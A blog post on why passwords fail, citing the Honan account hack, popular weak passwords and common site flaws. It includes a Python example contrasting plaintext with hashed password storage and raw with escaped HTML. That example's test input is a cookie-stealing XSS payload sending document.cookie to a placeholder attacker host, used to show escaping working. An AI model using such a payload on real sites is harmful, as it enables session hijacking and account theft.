The age of the password is over; at least that's the conclusion reached by Mat Honan (the now-famous @mat on Twitter), after his well-publicized experience at the hands of hackers. In brief, they gained access to his Apple iCloud account, and used it to wipe his iPhone, iPad and MacBook devices. They then gained access to his linked Gmail and Twitter accounts. They even wrote to him on Twitter, and explained how the hack worked.
Of course, it doesn't help that many of us are lax in our choice of passwords, and share the same password across several accounts. According to results recently published by Gizmodo, based on an analysis of millions of stolen passwords posted online by hackers, "password" is still one of the most popular passwords. On the bright side, some are clearly starting to heed advice, with more complex variations such as "password1" gaining in popularity...
The problem is that while strong passwords – long, alphanumeric, with improbable character substitutions, and so on – are obviously safer, they are still not necessarily "safe". In the Honan case, the hackers got his details not by hacking his strong password, but by persuading Apple to reset the password over the phone (a practice they've now suspended), armed with his address and the last four digits of his credit card.
Likewise, there are countless examples of substandard security practices on the various websites with which we entrust our personal details. Over recent months, Troy Hunt has done an excellent job highlighting security issues he found with Tesco's website, including passwords stored without being hashed or encrypted, passwords emailed in plain text, and a lack of HTTPS. These failings afflict many websites. I'd particularly recommend you catch Troy's video demonstration of how easy it is on many sites to exploit Cross Site Scripting (XSS) vulnerabilities. This is where an attacker is able to inject JavaScript via a URL on a legitimate website, so that it can "sniff" information the site stores in its cookies, or pop up an illegitimate logon form and capture username and password details.
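To make the two site-side failings above concrete, here is an added example (mine, not Troy's demonstration or anything from the original post) that places each weak practice beside its fix: storing a password verbatim versus storing a salted PBKDF2 hash that can be verified but not recovered, echoing a URL parameter into a page raw versus HTML-escaped, and setting a session cookie with the HttpOnly and Secure flags so that script injected into the page cannot read it. The function names and the sample inputs are my own constructions; the hashing and escaping calls are from the Python standard library.

```python
import hashlib
import hmac
import html
import secrets
from http.cookies import SimpleCookie
from typing import Optional

# --- 1. Password storage: plaintext (the failing described) vs salted, iterated hash ---

def store_plaintext(password: str) -> str:
    """The weak practice: whatever is stored can be emailed or leaked verbatim."""
    return password

def store_hashed(password: str, salt: Optional[bytes] = None, iterations: int = 200_000) -> str:
    """Store a per-user random salt and a PBKDF2-HMAC-SHA256 digest, never the password itself.
    The record format ("algo$iterations$salt$digest") is a constructed convention for this example."""
    salt = salt if salt is not None else secrets.token_bytes(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"

def verify_hashed(password: str, stored: str) -> bool:
    """Recompute the digest with the stored salt and compare in constant time."""
    _algo, iterations, salt_hex, digest_hex = stored.split("$")
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(digest.hex(), digest_hex)

# --- 2. Reflected XSS: echoing a URL parameter into the page raw vs HTML-escaped ---

def render_unescaped(name: str) -> str:
    """Vulnerable: the value taken from the URL lands in the markup unchanged."""
    return f"<p>Hello, {name}!</p>"

def render_escaped(name: str) -> str:
    """Fixed: every HTML-significant character becomes an entity, so no tag is formed."""
    return f"<p>Hello, {html.escape(name, quote=True)}!</p>"

def contains_script(markup: str) -> bool:
    """Crude check used only to show whether a script tag survived into the output."""
    return "<script" in markup.lower()

# --- 3. Session cookie flags: HttpOnly keeps the cookie out of reach of page script ---

def session_cookie_header(session_id: str) -> str:
    cookie = SimpleCookie()
    cookie["session"] = session_id
    cookie["session"]["httponly"] = True   # not readable via document.cookie
    cookie["session"]["secure"] = True     # only sent over HTTPS
    cookie["session"]["samesite"] = "Lax"
    return cookie.output(header="Set-Cookie:")

if __name__ == "__main__":
    record = store_hashed("password1")              # constructed sample password
    print(record)
    print(verify_hashed("password1", record), verify_hashed("password2", record))
    probe = "<script>document.location='https://attacker.invalid/?c='+document.cookie</script>"
    print(render_unescaped(probe))                  # tag reaches the browser
    print(render_escaped(probe))                    # rendered as harmless text
    print(session_cookie_header(secrets.token_hex(16)))
```

The escaping shown here covers the case of a value placed into HTML element content or a quoted attribute; a value that ends up inside a script block, a URL or a CSS string needs the encoding appropriate to that context, which is exactly the distinction the OWASP guidance referred to below spells out.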
So what's the answer? OWASP has provided excellent guidelines for making a site or service too difficult to hack to be worth the effort, in the vast majority of cases. The standards and best practices needed to avoid being hacked already exist, but implementing them requires time and investment, and often there simply doesn't seem to be the will to do it. We don't want to be bothered too much with security, and we wait for a "silver bullet" (such as biometric data, as suggested by Mat Honan) to rescue us from a tedious routine. Maybe a silver bullet isn't going to save us this time.
Cheers,
Tony.